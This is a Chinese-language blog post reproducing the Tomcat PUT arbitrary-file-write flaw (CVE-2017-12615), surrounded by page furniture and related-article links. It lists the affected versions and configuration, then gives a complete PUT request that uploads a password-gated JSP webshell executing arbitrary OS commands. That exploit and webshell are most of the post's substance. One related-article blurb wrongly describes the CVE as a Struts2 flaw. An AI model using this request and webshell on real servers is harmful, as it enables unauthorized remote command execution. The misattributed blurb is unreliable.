漏洞复现系列--Tomcat-PUT方法任意文件写入(CVE-2017-12615)

最新推荐文章于 2024-01-06 13:30:00 发布
最新推荐文章于 2024-01-06 13:30:00 发布
阅读量495 收藏
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40007043/article/details/103969844
版权

1、漏洞利用前提:
Tomcat版本: 7.0.0 - 7.0.81
配置文件conf/web.xml中的readonly设置为false
开启了PUT方法

2、复现过程:
用burp随意抓一个GET请求包,将GET改为PUT,并上传一个jsp文件

PUT /1.jsp/ HTTP/1.1
Host: 对应的网站host
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 5

<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("pwd".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println("hello");}%>
梦之履行地
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Tomcat 通过 PUT 方法任意写入文件漏洞 (CVE-2017-12615)
薛定谔嘚喵博客
04-02 1082
CVE-2017-12615 对应的漏洞任意文件写入,由于配置不当(非默认配置),导致可以使用 PUT 方法上传任意文件Tomcat设置了写权限(readonly=false),导致可以使用PUT方法上传任意文件
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
Tomcat PUT方法任意文件漏洞CVE-2017-12615
m0_52701599的博客
02-12 962
Tomcat PUT方法任意文件漏洞
Tomcat PUT 方法任意文件漏洞CVE-2017-12615复现
最新发布
weixin_47498728的博客
01-06 874
tomcat本身不允许上传 jsp 文件,但是1.jsp/ 加了 / 就不是 jsp 文件,所以文件可以成功上传。系统保存文件时因为不能存在/字符,所以/被忽略了,所以文件名从 1.jsp/ -> 1.jsp,至此jsp文件完成了上传并保存。
怎么使得tomcat支持put请求
这天有点热的博客
06-25 3760
在D:\apache-tomcat-9.0.8\conf\web.xml中&lt;servlet&gt;        &lt;servlet-name&gt;default&lt;/servlet-name&gt;        &lt;servlet-class&gt;org.apache.catalina.servlets.DefaultServlet&lt;/servlet-class&g...
漏洞复现Tomcat PUT方法任意文件漏洞CVE-2017-12615
weixin_42090431的博客
01-02 623
2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞漏洞CVE编号:CVE-2017-12615CVE-2017-12616,其中 远程代码执行漏洞CVE-2017-12615) 影响: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修复不完全)
TOMCAT PUT方法任意文件(CVE-2017-12615)-靶场复现
m0_66376444的博客
04-06 593
Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件。其实tomcat会对上传的文件内容进行限制,比如说禁止上传 .jpg 后缀的文件,只不过,这个过滤机制可以通过一些windows 或着 linux的特性绕过。2、修改请求协议PUT加文件名,在请求主体内写入可执行代码,点击发送。本次测试版本:Tomcat版本:8.5.19。
iis-put漏洞复现
qq_46527080的博客
01-05 1460
首先准备window server 2003r2 +iis6.0 然后搭建一个网站(需要启用webDAR) 一、搭建网站 初始页面 选择存放路径 权限给的大一点 添加一个可以解析的asp文档 网站添加一个erverone权限 二、漏洞扫描() http://192.168.0.178:80|Microsoft-IIS/6.0|http://192.168.0.178/20213705113750.txt|webdva漏洞 来源模式一 咱们到靶机中查看发现网站根目录下一个文件 然后结合另一个工具进行配合攻击
[CVE-2017-12615] Tomcat任意写入文件漏洞重现
aovenus的专栏-测试新时代(微信公众号:测试新时代)
10-18 942
[CVE-2017-12615] Tomcat任意写入文件漏洞重现
漏洞复现Tomcat 任意写入文件漏洞CVE-2017-12615
m0_46344990的博客
11-13 1332
Apache Tomcat 7.0.0到7.0.79版本中存在远程代码执行漏洞,当 Tomcat 运行在 Windows 主机上,且启用了 HTTP PUT 请求方法时,攻击者可通过精心构造的攻击请求向服务器上传包含任意代码的 JSP 文件文件中的代码被服务器执行。
tomcat put方法任意文件漏洞复现CVE-2017-12615
qq_54658370的博客
07-19 654
一丶漏洞原理 Windows服务器下,将readonly参数设置为false时(默认设置为true),即可通过PUT方式创建一个JSP文件,并可以执行任意代码。Windows不允许空格作为文件名结尾,所以我们上传的末尾带空格的jsp文件,就会自动创建一个jsp文件,导致代码执行。影响版本:7.0.0~7.0.79 几种绕过Tomcat的检测方式 1.利用Windows NTFS特性,evil.jsp::$DATA等于生成一个evil.jsp的jsp文件 二丶漏洞环境 ...
Apache Spark 命令注入(CVE-2022-33891)格式化文档
08-10
漏洞允许攻击者执行任意命令,包括读取、写入和删除文件、执行系统命令等。 影响版本: 该漏洞影响 Apache Spark 版本小于 3.0.3、3.1.1 到 3.1.2 以及 3.3.0 及以上版本。 修复方案: 为了修复该漏洞,建议升级...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值